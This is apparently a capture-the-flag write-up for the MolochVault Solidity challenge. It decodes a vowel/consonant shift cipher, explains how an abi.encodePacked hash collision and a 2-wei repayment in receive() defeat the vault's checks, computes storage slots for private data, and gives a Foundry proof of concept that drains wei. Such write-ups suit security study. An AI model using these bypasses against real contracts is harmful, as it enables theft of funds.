MolochVault.md

Details of decrypting Moloch-algorithm

We already know two string mappings:

  1. BLOODY PHARMACIST

    -> ZJQQBW*NFCPKCAKQR

  2. THE FUTURE OF HUMANITY REQUIRES THE SACRIFICE OF YOUR SHALLOW DESIRES

    -> RFG*DWRWPG*QD*FWKCLKRW*PGOWKPGQ*RFG*QCAPKDKAG*QD*WQWP*QFCJJQU*BGQKPGQ

    (I think there's a missing OF between SACRIFICE and YOUR)

This is my analysis:

  1. It looks like a simple shift, because the cipher length is identical to the plain text, and the same input characters give the same output everywhere, e.g. OO -> QQ
  2. I tried to use a loop to print the delta of each character; the delta is 2.
  3. Sometimes it's +2, sometimes -2. I found it is +2 when it's a vowel (A/E/I/O/U), otherwise it's -2.
  4. After +/- 2, if it's not in range 'A-Z', rotate it by +/- 26.
  5. If it's a space character ' ', replace it with '*'.

An implementation of the algorithm in Solidity:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Test {
	// Applies the Moloch substitution to an upper-case string.
	function molockAlgo(string memory plain) public pure returns (string memory) {
		bytes memory bs = bytes(plain);
		bytes memory ret = new bytes(bs.length);

		for (uint i = 0; i < bs.length; i++) {
			bytes1 b = bs[i];

			if (b == 'A' || b == 'E' || b == 'I' || b == 'O' || b == 'U') {
				// vowels shift forward by 2
				b = bytes1(uint8(b) + 2);
				if (b > 'Z') {
					b = bytes1(uint8(b) - 26);
				}
			} else if (b == ' ') {
				// spaces become '*'
				b = '*';
			} else {
				// everything else shifts back by 2, wrapping below 'A'
				b = bytes1(uint8(b) - 2);
				if (b < 'A') {
					b = bytes1(uint8(b) + 26);
				}
			}
			ret[i] = b;
		}

		return string(ret);
	}
}

Constructor parameters

The constructor arguments passed at deployment can be found on Etherscan.

The decoded view looks like:

-----Decoded View---------------
Arg [0] : molochPass (string): BLOODY PHARMACIST
Arg [1] : _b (string[2]): WHO DO YOU,SERVE?
Arg [2] : a (address[3]): 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4,0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2,0x4B20993Bc481177ec7E8f571ceCaE8A9e22C02db
Arg [3] : _passss (string[3]): KCLEQ,BGTGJQNGP,ZJQQBW*NFCPKCAKQR
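
The `_passss` values in the decoded view are outputs of the Moloch algorithm, and the mapping is not one-to-one: a vowel shifted by +2 and a consonant shifted by -2 can land on the same letter. The following Python sketch is an added example, not part of the original writeup or the contract; it rebuilds the forward cipher from the five rules above, derives the inverse table, and enumerates every plaintext that produces a given ciphertext. It assumes plaintext contains only A-Z and spaces, and all function names are hypothetical.

```python
from itertools import islice, product
import string

VOWELS = "AEIOU"

def moloch_encrypt(plain: str) -> str:
    """Forward cipher from the analysis: vowels +2, other letters -2, ' ' -> '*'."""
    out = []
    for ch in plain:
        if ch == " ":
            out.append("*")
        elif ch in string.ascii_uppercase:
            shift = 2 if ch in VOWELS else -2
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            # Assumption: only A-Z and space are valid plaintext.
            raise ValueError(f"unsupported character: {ch!r}")
    return "".join(out)

def preimage_table() -> dict:
    """Map each ciphertext character to every plaintext character producing it."""
    table = {"*": [" "]}
    for p in string.ascii_uppercase:
        table.setdefault(moloch_encrypt(p), []).append(p)
    return table

def ambiguous_outputs() -> dict:
    """Ciphertext letters with more than one preimage (vowel and consonant collide)."""
    return {c: ps for c, ps in preimage_table().items() if len(ps) > 1}

def moloch_candidates(cipher: str, limit: int = 4096) -> list:
    """All plaintexts that encrypt to `cipher`, capped at `limit` results."""
    table = preimage_table()
    if any(ch not in table for ch in cipher):
        return []  # M, S and Y are never produced, so this is not valid output
    choices = [table[ch] for ch in cipher]
    return ["".join(c) for c in islice(product(*choices), limit)]

if __name__ == "__main__":
    print(ambiguous_outputs())             # letters that cannot be inverted uniquely
    for word in ("KCLEQ", "BGTGJQNGP"):    # first two _passss values from the page
        print(word, "->", moloch_candidates(word))
```

Each ambiguous ciphertext letter doubles the candidate count, so short words yield a handful of candidates from which the readable one can be picked by eye.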

Explain bypass for keccak256(abi.encodePacked())

The function abi.encodePacked() can be used to concatenate strings. It adds no length prefix or padding between dynamic arguments, so different splits of the same text produce the same bytes.

abi.encodePacked("WHO DO YOU", "SERVE?") is equivalent to abi.encodePacked("WHO DO YOUSERVE?", "").

We use this to bypass the check require(keccak256(abi.encode(_openSecrete[1])) != keccak256(abi.encode(question[0])),"grant awarded!!");

Bypass the balance check

The vault requires its balance to be higher right after it sends out 1 wei, so we need to send back 2 wei in our receive() callback.

Detailed formula for finding slot of dynamic struct

Immutable variables don't have a reserved storage slot.

This is how to access the variable cabals:

The storage layout can be printed with solc --storage-layout ...sol; it looks like:

slot 0: realHacker
slot 1: question
slot 3: cabals  <---- here

For a dynamic array, the declared slot holds its length. The first element is at sha3(slot), where sha3 is keccak256 of the slot number padded to 32 bytes, and the element at IndexN is at: sha3(slot) + slot_size_of(Cabel)*IndexN

For example, to read cabals[7]: sha3(3) + 2*7

So cabals[7].identity is at sha3(3) + 2*7 + 0, where the + 0 means identity is at slot 0 of the struct, and cabals[7].password is at sha3(3) + 2*7 + 1.

POC (Foundry)

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

import "forge-std/Test.sol";
import "../src/MolochVault.sol";

contract SolveMolochVault is Test {
	MOLOCH_VAULT vault;

	address deployer = makeAddr("deployer");


	function setUp() public {
		vm.startPrank(deployer);
		// deploy with the creation bytecode copied from Etherscan
		// (placeholder: the hex blob is omitted here; paste it between the quotes)
		bytes memory all = hex"";
		address vault_;
		assembly {
			vault_ := create(0, add(all, 0x20), mload(all))
		}
		vault = MOLOCH_VAULT(payable(vault_));

		// give vault 1 wei
		vm.deal(address(vault), 1 wei);
		// give this contract (the attacker) 1 wei
		vm.deal(address(this), 1 wei);

		vm.stopPrank();
	}

	function testhack() public {
		string[3] memory openSecret;

		openSecret[0] = "BLOODY PHARMACIST";
		openSecret[1] = "WHO DO YOUSERVE?";
		openSecret[2] = "";

		payBack = true; // need to repay 2 wei to bypass the balance check
		vault.uhER778(openSecret); // this should register us as `realHacker`

		payBack = false; // don't pay back 2 wei when receiving 1 wei
		vault.sendGrant(payable(this)); // get back the 1 wei that we sent from `receive()` previously
		vault.sendGrant(payable(this)); // steal 1 wei

		// we have 1 wei in the first place, after stealing 1 wei, now we should have 2 wei
		require(address(this).balance == 2 wei, "steal 1 wei fail");
	}

	bool payBack;
	receive() external payable {
		if(payBack) {
			(bool success, ) = address(msg.sender).call{value:2 wei}("");
			require(success, "call fail");
		}
	}
}